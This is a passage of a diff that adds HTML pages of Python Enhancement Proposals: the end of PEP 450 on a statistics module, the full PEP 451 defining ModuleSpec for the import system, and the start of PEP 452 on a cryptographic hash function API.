The module currently targets 3.3, and I will make it available on PyPI for +3.3 for the foreseeable future. Backporting to older versions of the 3.x +series is likely (but not yet decided). Backporting to 2.7 is less likely but +not ruled out.

+
+
+

Is this supposed to replace numpy?

+

No. While it is likely to grow over the years (see open issues below) it is +not aimed to replace, or even compete directly with, numpy. Numpy is a +full-featured numeric library aimed at professionals, the nuclear reactor of +numeric libraries in the Python ecosystem. This is just a battery, as in +“batteries included”, and is aimed at an intermediate level somewhere between +“use numpy” and “roll your own version”.

+
+
+
+

Future Work

+
    +
  • At this stage, I am unsure of the best API for multivariate statistical +functions such as linear regression, correlation coefficient, and covariance. +Possible APIs include:
      +
    • Separate arguments for x and y data:
      function([x0, x1, ...], [y0, y1, ...])
      +
      +
      +
    • +
    • A single argument for (x, y) data:
      function([(x0, y0), (x1, y1), ...])
      +
      +
      +

      This API is preferred by GvR [24].

      +
    • +
    • Selecting arbitrary columns from a 2D array:
      function([[a0, x0, y0, z0], [a1, x1, y1, z1], ...], x=1, y=2)
      +
      +
      +
    • +
    • Some combination of the above.
    • +
    +

    In the absence of a consensus of preferred API for multivariate stats, I will +defer including such multivariate functions until Python 3.5.

    +
  • +
  • Likewise, functions for calculating probability of random variables and +inference testing (e.g. Student’s t-test) will be deferred until 3.5.
  • +
  • There is considerable interest in including one-pass functions that can +calculate multiple statistics from data in iterator form, without having to +convert to a list. The experimental stats package on PyPI includes +co-routine versions of statistics functions. Including these will be deferred +to 3.5.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0450.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0451/index.html b/pep-0451/index.html new file mode 100644 index 00000000000..d3fb2192bb5 --- /dev/null +++ b/pep-0451/index.html @@ -0,0 +1,1086 @@ + + + + + + + + PEP 451 – A ModuleSpec Type for the Import System | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 451 – A ModuleSpec Type for the Import System

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
BDFL-Delegate:
+
Brett Cannon <brett at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Import-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-Aug-2013
+
Python-Version:
+
3.4
+
Post-History:
+
08-Aug-2013, 28-Aug-2013, 18-Sep-2013, 24-Sep-2013, 04-Oct-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add a new class to importlib.machinery called +“ModuleSpec”. It will provide all the import-related information used +to load a module and will be available without needing to load the +module first. Finders will directly provide a module’s spec instead of +a loader (which they will continue to provide indirectly). The import +machinery will be adjusted to take advantage of module specs, including +using them to load modules.

+
+
+

Terms and Concepts

+

The changes in this proposal are an opportunity to make several +existing terms and concepts more clear, whereas currently they are +(unfortunately) ambiguous. New concepts are also introduced in this +proposal. Finally, it’s worth explaining a few other existing terms +with which people may not be so familiar. For the sake of context, here +is a brief summary of all three groups of terms and concepts. A more +detailed explanation of the import system is found at +[2].

+
+

name

+

In this proposal, a module’s “name” refers to its fully-qualified name, +meaning the fully-qualified name of the module’s parent (if any) joined +to the simple name of the module by a period.

+
+
+

finder

+

A “finder” is an object that identifies the loader that the import +system should use to load a module. Currently this is accomplished by +calling the finder’s find_module() method, which returns the loader.

+

Finders are strictly responsible for providing the loader, which they do +through their find_module() method. The import system then uses that +loader to load the module.

+
+
+

loader

+

A “loader” is an object that is used to load a module during import. +Currently this is done by calling the loader’s load_module() method. A +loader may also provide APIs for getting information about the modules +it can load, as well as about data from sources associated with such a +module.

+

Right now loaders (via load_module()) are responsible for certain +boilerplate, import-related operations. These are:

+
    +
  1. Perform some (module-related) validation
  2. +
  3. Create the module object
  4. +
  5. Set import-related attributes on the module
  6. +
  7. “Register” the module to sys.modules
  8. +
  9. Exec the module
  10. +
  11. Clean up in the event of failure while loading the module
  12. +
+

This all takes place during the import system’s call to +Loader.load_module().

+
+
+

origin

+

This is a new term and concept. The idea of it exists subtly in the +import system already, but this proposal makes the concept explicit.

+

“origin” in an import context means the system (or resource within a +system) from which a module originates. For the purposes of this +proposal, “origin” is also a string which identifies such a resource or +system. “origin” is applicable to all modules.

+

For example, the origin for built-in and frozen modules is the +interpreter itself. The import system already identifies this origin as +“built-in” and “frozen”, respectively. This is demonstrated in the +following module repr: “<module ‘sys’ (built-in)>”.

+

In fact, the module repr is already a relatively reliable, though +implicit, indicator of a module’s origin. Other modules also indicate +their origin through other means, as described in the entry for +“location”.

+

It is up to the loader to decide on how to interpret and use a module’s +origin, if at all.

+
+
+

location

+

This is a new term. However the concept already exists clearly in the +import system, as associated with the __file__ and __path__ +attributes of modules, as well as the name/term “path” elsewhere.

+

A “location” is a resource or “place”, rather than a system at large, +from which a module is loaded. It qualifies as an “origin”. Examples +of locations include filesystem paths and URLs. A location is +identified by the name of the resource, but may not necessarily identify +the system to which the resource pertains. In such cases the loader +would have to identify the system itself.

+

In contrast to other kinds of module origin, a location cannot be +inferred by the loader just by the module name. Instead, the loader +must be provided with a string to identify the location, usually by the +finder that generates the loader. The loader then uses this information +to locate the resource from which it will load the module. In theory +you could load the module at a given location under various names.

+

The most common example of locations in the import system are the +files from which source and extension modules are loaded. For these +modules the location is identified by the string in the __file__ +attribute. Although __file__ isn’t particularly accurate for some +modules (e.g. zipped), it is currently the only way that the import +system indicates that a module has a location.

+

A module that has a location may be called “locatable”.

+
+
+

cache

+

The import system stores compiled modules in the __pycache__ directory +as an optimization. This module cache that we use today was provided by +PEP 3147. For this proposal, the relevant API for module caching is the +__cache__ attribute of modules and the cache_from_source() function +in importlib.util. Loaders are responsible for putting modules into the +cache (and loading out of the cache). Currently the cache is only used +for compiled source modules. However, loaders may take advantage of +the module cache for other kinds of modules.

+
+
+

package

+

The concept does not change, nor does the term. However, the +distinction between modules and packages is mostly superficial. +Packages are modules. They simply have a __path__ attribute and +import may add attributes bound to submodules. The typically perceived +difference is a source of confusion. This proposal explicitly +de-emphasizes the distinction between packages and modules where it +makes sense to do so.

+
+
+
+

Motivation

+

The import system has evolved over the lifetime of Python. In late 2002 +PEP 302 introduced standardized import hooks via finders and +loaders and sys.meta_path. The importlib module, introduced +with Python 3.1, now exposes a pure Python implementation of the APIs +described by PEP 302, as well as of the full import system. It is now +much easier to understand and extend the import system. While a benefit +to the Python community, this greater accessibility also presents a +challenge.

+

As more developers come to understand and customize the import system, +any weaknesses in the finder and loader APIs will be more impactful. So +the sooner we can address any such weaknesses the import system, the +better…and there are a couple we hope to take care of with this proposal.

+

Firstly, any time the import system needs to save information about a +module we end up with more attributes on module objects that are +generally only meaningful to the import system. It would be nice to +have a per-module namespace in which to put future import-related +information and to pass around within the import system. Secondly, +there’s an API void between finders and loaders that causes undue +complexity when encountered. The PEP 420 (namespace packages) +implementation had to work around this. The complexity surfaced again +during recent efforts on a separate proposal. [1]

+

The finder and loader sections above detail current responsibility +of both. Notably, loaders are not required to provide any of the +functionality of their load_module() method through other methods. Thus, +though the import-related information about a module is likely available +without loading the module, it is not otherwise exposed.

+

Furthermore, the requirements associated with load_module() are +common to all loaders and mostly are implemented in exactly the same +way. This means every loader has to duplicate the same boilerplate +code. importlib.util provides some tools that help with this, but +it would be more helpful if the import system simply took charge of +these responsibilities. The trouble is that this would limit the degree +of customization that load_module() could easily continue to facilitate.

+

More importantly, While a finder could provide the information that +the loader’s load_module() would need, it currently has no consistent +way to get it to the loader. This is a gap between finders and loaders +which this proposal aims to fill.

+

Finally, when the import system calls a finder’s find_module(), the +finder makes use of a variety of information about the module that is +useful outside the context of the method. Currently the options are +limited for persisting that per-module information past the method call, +since it only returns the loader. Popular options for this limitation +are to store the information in a module-to-info mapping somewhere on +the finder itself, or store it on the loader.

+

Unfortunately, loaders are not required to be module-specific. On top +of that, some of the useful information finders could provide is +common to all finders, so ideally the import system could take care of +those details. This is the same gap as before between finders and +loaders.

+

As an example of complexity attributable to this flaw, the +implementation of namespace packages in Python 3.3 (see PEP 420) added +FileFinder.find_loader() because there was no good way for +find_module() to provide the namespace search locations.

+

The answer to this gap is a ModuleSpec object that contains the +per-module information and takes care of the boilerplate functionality +involved with loading the module.

+
+
+

Specification

+

The goal is to address the gap between finders and loaders while +changing as little of their semantics as possible. Though some +functionality and information is moved to the new ModuleSpec type, +their behavior should remain the same. However, for the sake of clarity +the finder and loader semantics will be explicitly identified.

+

Here is a high-level summary of the changes described by this PEP. More +detail is available in later sections.

+
+

importlib.machinery.ModuleSpec (new)

+

An encapsulation of a module’s import-system-related state during import. +See the ModuleSpec section below for a more detailed description.

+
    +
  • ModuleSpec(name, loader, *, origin=None, loader_state=None, is_package=None)
  • +
+

Attributes:

+
    +
  • name - a string for the fully-qualified name of the module.
  • +
  • loader - the loader to use for loading.
  • +
  • origin - the name of the place from which the module is loaded, +e.g. “builtin” for built-in modules and the filename for modules +loaded from source.
  • +
  • submodule_search_locations - list of strings for where to find +submodules, if a package (None otherwise).
  • +
  • loader_state - a container of extra module-specific data for use +during loading.
  • +
  • cached (property) - a string for where the compiled module should be +stored.
  • +
  • parent (RO-property) - the fully-qualified name of the package to +which the module belongs as a submodule (or None).
  • +
  • has_location (RO-property) - a flag indicating whether or not the +module’s “origin” attribute refers to a location.
  • +
+
+
+

importlib.util Additions

+

These are ModuleSpec factory functions, meant as a convenience for +finders. See the Factory Functions section below for more detail.

+
    +
  • spec_from_file_location(name, location, *, loader=None, submodule_search_locations=None) +- build a spec from file-oriented information and loader APIs.
  • +
  • spec_from_loader(name, loader, *, origin=None, is_package=None) +- build a spec with missing information filled in by using loader +APIs.
  • +
+
+
+

Other API Additions

+
    +
  • importlib.find_spec(name, path=None, target=None) will work exactly +the same as importlib.find_loader() (which it replaces), but return a +spec instead of a loader.
  • +
+

For finders:

+
    +
  • importlib.abc.MetaPathFinder.find_spec(name, path, target) and +importlib.abc.PathEntryFinder.find_spec(name, target) will return a +module spec to use during import.
  • +
+

For loaders:

+
    +
  • importlib.abc.Loader.exec_module(module) will execute a module in its +own namespace. It replaces importlib.abc.Loader.load_module(), taking +over its module execution functionality.
  • +
  • importlib.abc.Loader.create_module(spec) (optional) will return the +module to use for loading.
  • +
+

For modules:

+
    +
  • Module objects will have a new attribute: __spec__.
  • +
+
+
+

API Changes

+
    +
  • InspectLoader.is_package() will become optional.
  • +
+
+
+

Deprecations

+
    +
  • importlib.abc.MetaPathFinder.find_module()
  • +
  • importlib.abc.PathEntryFinder.find_module()
  • +
  • importlib.abc.PathEntryFinder.find_loader()
  • +
  • importlib.abc.Loader.load_module()
  • +
  • importlib.abc.Loader.module_repr()
  • +
  • importlib.util.set_package()
  • +
  • importlib.util.set_loader()
  • +
  • importlib.find_loader()
  • +
+
+
+

Removals

+

These were introduced prior to Python 3.4’s release, so they can simply +be removed.

+
    +
  • importlib.abc.Loader.init_module_attrs()
  • +
  • importlib.util.module_to_load()
  • +
+
+
+

Other Changes

+
    +
  • The import system implementation in importlib will be changed to make +use of ModuleSpec.
  • +
  • importlib.reload() will make use of ModuleSpec.
  • +
  • A module’s import-related attributes (other than __spec__) will no +longer be used directly by the import system during that module’s +import. However, this does not impact use of those attributes +(e.g. __path__) when loading other modules (e.g. submodules).
  • +
  • Import-related attributes should no longer be added to modules +directly, except by the import system.
  • +
  • The module type’s __repr__() will be a thin wrapper around a pure +Python implementation which will leverage ModuleSpec.
  • +
  • The spec for the __main__ module will reflect the appropriate +name and origin.
  • +
+
+
+

Backward-Compatibility

+
    +
  • If a finder does not define find_spec(), a spec is derived from +the loader returned by find_module().
  • +
  • PathEntryFinder.find_loader() still takes priority over +find_module().
  • +
  • Loader.load_module() is used if exec_module() is not defined.
  • +
+
+
+

What Will not Change?

+
    +
  • The syntax and semantics of the import statement.
  • +
  • Existing finders and loaders will continue to work normally.
  • +
  • The import-related module attributes will still be initialized with +the same information.
  • +
  • Finders will still create loaders (now storing them in specs).
  • +
  • Loader.load_module(), if a module defines it, will have all the +same requirements and may still be called directly.
  • +
  • Loaders will still be responsible for module data APIs.
  • +
  • importlib.reload() will still overwrite the import-related attributes.
  • +
+
+
+

Responsibilities

+

Here’s a quick breakdown of where responsibilities lie after this PEP.

+

finders:

+
    +
  • create/identify a loader that can load the module.
  • +
  • create the spec for the module.
  • +
+

loaders:

+
    +
  • create the module (optional).
  • +
  • execute the module.
  • +
+

ModuleSpec:

+
    +
  • orchestrate module loading
  • +
  • boilerplate for module loading, including managing sys.modules and +setting import-related attributes
  • +
  • create module if loader doesn’t
  • +
  • call loader.exec_module(), passing in the module in which to exec
  • +
  • contain all the information the loader needs to exec the module
  • +
  • provide the repr for modules
  • +
+
+
+
+

What Will Existing Finders and Loaders Have to Do Differently?

+

Immediately? Nothing. The status quo will be deprecated, but will +continue working. However, here are the things that the authors of +finders and loaders should change relative to this PEP:

+
    +
  • Implement find_spec() on finders.
  • +
  • Implement exec_module() on loaders, if possible.
  • +
+

The ModuleSpec factory functions in importlib.util are intended to be +helpful for converting existing finders. spec_from_loader() and +spec_from_file_location() are both straightforward utilities in this +regard.

+

For existing loaders, exec_module() should be a relatively direct +conversion from the non-boilerplate portion of load_module(). In some +uncommon cases the loader should also implement create_module().

+
+
+

ModuleSpec Users

+

ModuleSpec objects have 3 distinct target audiences: Python itself, +import hooks, and normal Python users.

+

Python will use specs in the import machinery, in interpreter startup, +and in various standard library modules. Some modules are +import-oriented, like pkgutil, and others are not, like pickle and +pydoc. In all cases, the full ModuleSpec API will get used.

+

Import hooks (finders and loaders) will make use of the spec in specific +ways. First of all, finders may use the spec factory functions in +importlib.util to create spec objects. They may also directly adjust +the spec attributes after the spec is created. Secondly, the finder may +bind additional information to the spec (in finder_extras) for the +loader to consume during module creation/execution. Finally, loaders +will make use of the attributes on a spec when creating and/or executing +a module.

+

Python users will be able to inspect a module’s __spec__ to get +import-related information about the object. Generally, Python +applications and interactive users will not be using the ModuleSpec +factory functions nor any the instance methods.

+
+
+

How Loading Will Work

+

Here is an outline of what the import machinery does during loading, +adjusted to take advantage of the module’s spec and the new loader API:

+
module = None
+if spec.loader is not None and hasattr(spec.loader, 'create_module'):
+    module = spec.loader.create_module(spec)
+if module is None:
+    module = ModuleType(spec.name)
+# The import-related module attributes get set here:
+_init_module_attrs(spec, module)
+
+if spec.loader is None and spec.submodule_search_locations is not None:
+    # Namespace package
+    sys.modules[spec.name] = module
+elif not hasattr(spec.loader, 'exec_module'):
+    spec.loader.load_module(spec.name)
+    # __loader__ and __package__ would be explicitly set here for
+    # backwards-compatibility.
+else:
+    sys.modules[spec.name] = module
+    try:
+        spec.loader.exec_module(module)
+    except BaseException:
+        try:
+            del sys.modules[spec.name]
+        except KeyError:
+            pass
+        raise
+module_to_return = sys.modules[spec.name]
+
+
+

These steps are exactly what Loader.load_module() is already +expected to do. Loaders will thus be simplified since they will only +need to implement exec_module().

+

Note that we must return the module from sys.modules. During loading +the module may have replaced itself in sys.modules. Since we don’t have +a post-import hook API to accommodate the use case, we have to deal with +it. However, in the replacement case we do not worry about setting the +import-related module attributes on the object. The module writer is on +their own if they are doing this.

+
+
+

How Reloading Will Work

+

Here is the corresponding outline for reload():

+
_RELOADING = {}
+
+def reload(module):
+    try:
+        name = module.__spec__.name
+    except AttributeError:
+        name = module.__name__
+    spec = find_spec(name, target=module)
+
+    if sys.modules.get(name) is not module:
+        raise ImportError
+    if spec in _RELOADING:
+        return _RELOADING[name]
+    _RELOADING[name] = module
+    try:
+        if spec.loader is None:
+            # Namespace loader
+            _init_module_attrs(spec, module)
+            return module
+        if spec.parent and spec.parent not in sys.modules:
+            raise ImportError
+
+        _init_module_attrs(spec, module)
+        # Ignoring backwards-compatibility call to load_module()
+        # for simplicity.
+        spec.loader.exec_module(module)
+        return sys.modules[name]
+    finally:
+        del _RELOADING[name]
+
+
+

A key point here is the switch to Loader.exec_module() means that +loaders will no longer have an easy way to know at execution time if it +is a reload or not. Before this proposal, they could simply check to +see if the module was already in sys.modules. Now, by the time +exec_module() is called during load (not reload) the import machinery +would already have placed the module in sys.modules. This is part of +the reason why find_spec() has +the “target” parameter.

+

The semantics of reload will remain essentially the same as they exist +already [5]. The impact of this PEP on some kinds +of lazy loading modules was a point of discussion. [4]

+
+
+

ModuleSpec

+
+

Attributes

+

Each of the following names is an attribute on ModuleSpec objects. A +value of None indicates “not set”. This contrasts with module +objects where the attribute simply doesn’t exist. Most of the +attributes correspond to the import-related attributes of modules. Here +is the mapping. The reverse of this mapping describes how the import +machinery sets the module attributes right before calling exec_module().

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
On ModuleSpecOn Modules
name__name__
loader__loader__
parent__package__
origin__file__*
cached__cached__*,**
submodule_search_locations__path__**
loader_state-
has_location-
+
+
* Set on the module only if spec.has_location is true.
+
** Set on the module only if the spec attribute is not None.
+
+

While parent and has_location are read-only properties, the remaining +attributes can be replaced after the module spec is created and even +after import is complete. This allows for unusual cases where directly +modifying the spec is the best option. However, typical use should not +involve changing the state of a module’s spec.

+

origin

+

“origin” is a string for the name of the place from which the module +originates. See origin above. Aside from the informational value, +it is also used in the module’s repr. In the case of a spec where +“has_location” is true, __file__ is set to the value of “origin”. +For built-in modules “origin” would be set to “built-in”.

+

has_location

+

As explained in the location section above, many modules are +“locatable”, meaning there is a corresponding resource from which the +module will be loaded and that resource can be described by a string. +In contrast, non-locatable modules can’t be loaded in this fashion, e.g. +builtin modules and modules dynamically created in code. For these, the +name is the only way to access them, so they have an “origin” but not a +“location”.

+

“has_location” is true if the module is locatable. In that case the +spec’s origin is used as the location and __file__ is set to +spec.origin. If additional location information is required (e.g. +zipimport), that information may be stored in spec.loader_state.

+

“has_location” may be implied from the existence of a load_data() method +on the loader.

+

Incidentally, not all locatable modules will be cache-able, but most +will.

+

submodule_search_locations

+

The list of location strings, typically directory paths, in which to +search for submodules. If the module is a package this will be set to +a list (even an empty one). Otherwise it is None.

+

The name of the corresponding module attribute, __path__, is +relatively ambiguous. Instead of mirroring it, we use a more explicit +attribute name that makes the purpose clear.

+

loader_state

+

A finder may set loader_state to any value to provide additional +data for the loader to use during loading. A value of None is the +default and indicates that there is no additional data. Otherwise it +can be set to any object, such as a dict, list, or +types.SimpleNamespace, containing the relevant extra information.

+

For example, zipimporter could use it to pass the zip archive name +to the loader directly, rather than needing to derive it from origin +or create a custom loader for each find operation.

+

loader_state is meant for use by the finder and corresponding loader. +It is not guaranteed to be a stable resource for any other use.

+
+
+

Factory Functions

+

spec_from_file_location(name, location, *, loader=None, submodule_search_locations=None)

+

Build a spec from file-oriented information and loader APIs.

+
    +
  • “origin” will be set to the location.
  • +
  • “has_location” will be set to True.
  • +
  • “cached” will be set to the result of calling cache_from_source().
  • +
  • “origin” can be deduced from loader.get_filename() (if “location” is +not passed in.
  • +
  • “loader” can be deduced from suffix if the location is a filename.
  • +
  • “submodule_search_locations” can be deduced from loader.is_package() +and from os.path.dirname(location) if location is a filename.
  • +
+

spec_from_loader(name, loader, *, origin=None, is_package=None)

+

Build a spec with missing information filled in by using loader APIs.

+
    +
  • “has_location” can be deduced from loader.get_data.
  • +
  • “origin” can be deduced from loader.get_filename().
  • +
  • “submodule_search_locations” can be deduced from loader.is_package() +and from os.path.dirname(location) if location is a filename.
  • +
+
+
+

Backward Compatibility

+

ModuleSpec doesn’t have any. This would be a different story if +Finder.find_module() were to return a module spec instead of loader. +In that case, specs would have to act like the loader that would have +been returned instead. Doing so would be relatively simple, but is an +unnecessary complication. It was part of earlier versions of this PEP.

+
+
+

Subclassing

+

Subclasses of ModuleSpec are allowed, but should not be necessary. +Simply setting loader_state or adding functionality to a custom +finder or loader will likely be a better fit and should be tried first. +However, as long as a subclass still fulfills the requirements of the +import system, objects of that type are completely fine as the return +value of Finder.find_spec(). The same points apply to duck-typing.

+
+
+
+

Existing Types

+
+

Module Objects

+

Other than adding __spec__, none of the import-related module +attributes will be changed or deprecated, though some of them could be; +any such deprecation can wait until Python 4.

+

A module’s spec will not be kept in sync with the corresponding +import-related attributes. Though they may differ, in practice they +will typically be the same.

+

One notable exception is that case where a module is run as a script by +using the -m flag. In that case module.__spec__.name will +reflect the actual module name while module.__name__ will be +__main__.

+

A module’s spec is not guaranteed to be identical between two modules +with the same name. Likewise there is no guarantee that successive +calls to importlib.find_spec() will return the same object or even an +equivalent object, though at least the latter is likely.

+
+
+

Finders

+

Finders are still responsible for identifying, and typically creating, +the loader that should be used to load a module. That loader will +now be stored in the module spec returned by find_spec() rather +than returned directly. As is currently the case without the PEP, if a +loader would be costly to create, that loader can be designed to defer +the cost until later.

+

MetaPathFinder.find_spec(name, path=None, target=None)

+

PathEntryFinder.find_spec(name, target=None)

+

Finders must return ModuleSpec objects when find_spec() is +called. This new method replaces find_module() and +find_loader() (in the PathEntryFinder case). If a loader does +not have find_spec(), find_module() and find_loader() are +used instead, for backward-compatibility.

+

Adding yet another similar method to loaders is a case of practicality. +find_module() could be changed to return specs instead of loaders. +This is tempting because the import APIs have suffered enough, +especially considering PathEntryFinder.find_loader() was just +added in Python 3.3. However, the extra complexity and a +less-than-explicit method name aren’t worth it.

+
+
+

The “target” parameter of find_spec()

+

A call to find_spec() may optionally include a “target” argument. This +is the module object that will be used subsequently as the target of +loading. During normal import (and by default) “target” is None, +meaning the target module has yet to be created. During reloading the +module passed in to reload() is passed through to find_spec() as the +target. This argument allows the finder to build the module spec with +more information than is otherwise available. Doing so is particularly +relevant in identifying the loader to use.

+

Through find_spec() the finder will always identify the loader it +will return in the spec (or return None). At the point the loader is +identified, the finder should also decide whether or not the loader +supports loading into the target module, in the case that “target” is +passed in. This decision may entail consulting with the loader.

+

If the finder determines that the loader does not support loading into +the target module, it should either find another loader or raise +ImportError (completely stopping import of the module). This +determination is especially important during reload since, as noted in +How Reloading Will Work, loaders will no longer be able to trivially +identify a reload situation on their own.

+

Two alternatives were presented to the “target” parameter: +Loader.supports_reload() and adding “target” to Loader.exec_module() +instead of find_spec(). supports_reload() was the initial approach to +the reload situation. [6] However, there was some +opposition to the loader-specific, reload-centric approach. +[7]

+

As to “target” on exec_module(), the loader may need other information +from the target module (or spec) during reload, more than just “does +this loader support reloading this module”, that is no longer available +with the move away from load_module(). A proposal on the table was to +add something like “target” to exec_module(). [8] +However, putting “target” on find_spec() instead is more in line with +the goals of this PEP. Furthermore, it obviates the need for +supports_reload().

+
+
+

Namespace Packages

+

Currently a path entry finder may return (None, portions) from +find_loader() to indicate it found part of a possible namespace +package. To achieve the same effect, find_spec() must return a spec +with “loader” set to None (a.k.a. not set) and with +submodule_search_locations set to the same portions as would have been +provided by find_loader(). It’s up to PathFinder how to handle such +specs.

+
+
+

Loaders

+

Loader.exec_module(module)

+

Loaders will have a new method, exec_module(). Its only job +is to “exec” the module and consequently populate the module’s +namespace. It is not responsible for creating or preparing the module +object, nor for any cleanup afterward. It has no return value. +exec_module() will be used during both loading and reloading.

+

exec_module() should properly handle the case where it is called more +than once. For some kinds of modules this may mean raising ImportError +every time after the first time the method is called. This is +particularly relevant for reloading, where some kinds of modules do not +support in-place reloading.

+

Loader.create_module(spec)

+

Loaders may also implement create_module() that will return a +new module to exec. It may return None to indicate that the default +module creation code should be used. One use case, though atypical, for +create_module() is to provide a module that is a subclass of the builtin +module type. Most loaders will not need to implement create_module(),

+

create_module() should properly handle the case where it is called more +than once for the same spec/module. This may include returning None or +raising ImportError.

+
+

Note

+

exec_module() and create_module() should not set any import-related +module attributes. The fact that load_module() does is a design flaw +that this proposal aims to correct.

+
+

Other changes:

+

PEP 420 introduced the optional module_repr() loader method to limit +the amount of special-casing in the module type’s __repr__(). Since +this method is part of ModuleSpec, it will be deprecated on loaders. +However, if it exists on a loader it will be used exclusively.

+

Loader.init_module_attr() method, added prior to Python 3.4’s +release, will be removed in favor of the same method on ModuleSpec.

+

However, InspectLoader.is_package() will not be deprecated even +though the same information is found on ModuleSpec. ModuleSpec +can use it to populate its own is_package if that information is +not otherwise available. Still, it will be made optional.

+

In addition to executing a module during loading, loaders will still be +directly responsible for providing APIs concerning module-related data.

+
+
+
+

Other Changes

+
    +
  • The various finders and loaders provided by importlib will be +updated to comply with this proposal.
  • +
  • Any other implementations of or dependencies on the import-related APIs +(particularly finders and loaders) in the stdlib will be likewise +adjusted to this PEP. While they should continue to work, any such +changes that get missed should be considered bugs for the Python 3.4.x +series.
  • +
  • The spec for the __main__ module will reflect how the interpreter +was started. For instance, with -m the spec’s name will be that +of the module used, while __main__.__name__ will still be +“__main__”.
  • +
  • We will add importlib.find_spec() to mirror importlib.find_loader() +(which becomes deprecated).
  • +
  • importlib.reload() is changed to use ModuleSpec.
  • +
  • importlib.reload() will now make use of the per-module import lock.
  • +
+
+
+

Reference Implementation

+

A reference implementation is available at +http://bugs.python.org/issue18864.

+
+

Implementation Notes

+

* The implementation of this PEP needs to be cognizant of its impact on +pkgutil (and setuptools). pkgutil has some generic function-based +extensions to PEP 302 which may break if importlib starts wrapping +loaders without the tools’ knowledge.

+

* Other modules to look at: runpy (and pythonrun.c), pickle, pydoc, +inspect.

+

For instance, pickle should be updated in the __main__ case to look +at module.__spec__.name.

+
+
+
+

Rejected Additions to the PEP

+

There were a few proposed additions to this proposal that did not fit +well enough into its scope.

+

There is no “PathModuleSpec” subclass of ModuleSpec that separates out +has_location, cached, and submodule_search_locations. While that might +make the separation cleaner, module objects don’t have that distinction. +ModuleSpec will support both cases equally well.

+

While “ModuleSpec.is_package” would be a simple additional attribute +(aliasing self.submodule_search_locations is not None), it perpetuates +the artificial (and mostly erroneous) distinction between modules and +packages.

+

The module spec Factory Functions could be classmethods on +ModuleSpec. However that would expose them on all modules via +__spec__, which has the potential to unnecessarily confuse +non-advanced Python users. The factory functions have a specific use +case, to support finder authors. See ModuleSpec Users.

+

Likewise, several other methods could be added to ModuleSpec that expose +the specific uses of module specs by the import machinery:

+
    +
  • create() - a wrapper around Loader.create_module().
  • +
  • exec(module) - a wrapper around Loader.exec_module().
  • +
  • load() - an analogue to the deprecated Loader.load_module().
  • +
+

As with the factory functions, exposing these methods via +module.__spec__ is less than desirable. They would end up being an +attractive nuisance, even if only exposed as “private” attributes (as +they were in previous versions of this PEP). If someone finds a need +for these methods later, we can expose the via an appropriate API +(separate from ModuleSpec) at that point, perhaps relative to PEP 406 +(import engine).

+

Conceivably, the load() method could optionally take a list of +modules with which to interact instead of sys.modules. Also, load() +could be leveraged to implement multi-version imports. Both are +interesting ideas, but definitely outside the scope of this proposal.

+

Others left out:

+
    +
  • Add ModuleSpec.submodules (RO-property) - returns possible submodules +relative to the spec.
  • +
  • Add ModuleSpec.loaded (RO-property) - the module in sys.module, if +any.
  • +
  • Add ModuleSpec.data - a descriptor that wraps the data API of the +spec’s loader.
  • +
  • Also see [3].
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0451.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0452/index.html b/pep-0452/index.html new file mode 100644 index 00000000000..1a0c982c5bb --- /dev/null +++ b/pep-0452/index.html @@ -0,0 +1,368 @@ + + + + + + + + PEP 452 – API for Cryptographic Hash Functions v2.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 452 – API for Cryptographic Hash Functions v2.0

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>, Christian Heimes <christian at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
15-Aug-2013
+
Post-History:
+

+
Replaces:
+
247
+
+
+
+
Table of Contents +
+
+

Abstract

+

There are several different modules available that implement +cryptographic hashing algorithms such as MD5 or SHA. This +document specifies a standard API for such algorithms, to make it +easier to switch between different implementations.

+
+
+

Specification

+

All hashing modules should present the same interface. Additional +methods or variables can be added, but those described in this +document should always be present.

+

Hash function modules define one function:

+

new([string])            (unkeyed hashes)

+
+
new(key, [string], [digestmod])    (keyed hashes)
Create a new hashing object and return it. The first form is +for hashes that are unkeyed, such as MD5 or SHA. For keyed +hashes such as HMAC, ‘key’ is a required parameter containing +a string giving the key to use. In both cases, the optional +‘string’ parameter, if supplied, will be immediately hashed +into the object’s starting state, as if obj.update(string) was +called.

After creating a hashing object, arbitrary bytes can be fed +into the object using its update() method, and the hash value +can be obtained at any time by calling the object’s digest() +method.

+

Although the parameter is called ‘string’, hashing objects operate +on 8-bit data only. Both ‘key’ and ‘string’ must be a bytes-like +object (bytes, bytearray…). A hashing object may support +one-dimensional, contiguous buffers as argument, too. Text +(unicode) is no longer supported in Python 3.x. Python 2.x +implementations may take ASCII-only unicode as argument, but +portable code should not rely on the feature.

+

Arbitrary additional keyword arguments can be added to this +function, but if they’re not supplied, sensible default values +should be used. For example, ‘rounds’ and ‘digest_size’ +keywords could be added for a hash function which supports a +variable number of rounds and several different output sizes, +and they should default to values believed to be secure.

+
+
+

Hash function modules define one variable:

+
+
digest_size
An integer value; the size of the digest produced by the +hashing objects created by this module, measured in bytes. +You could also obtain this value by creating a sample object +and accessing its ‘digest_size’ attribute, but it can be +convenient to have this value available from the module. +Hashes with a variable output size will set this variable to +None.
+
+

Hashing objects require the following attribute:

+
+
digest_size
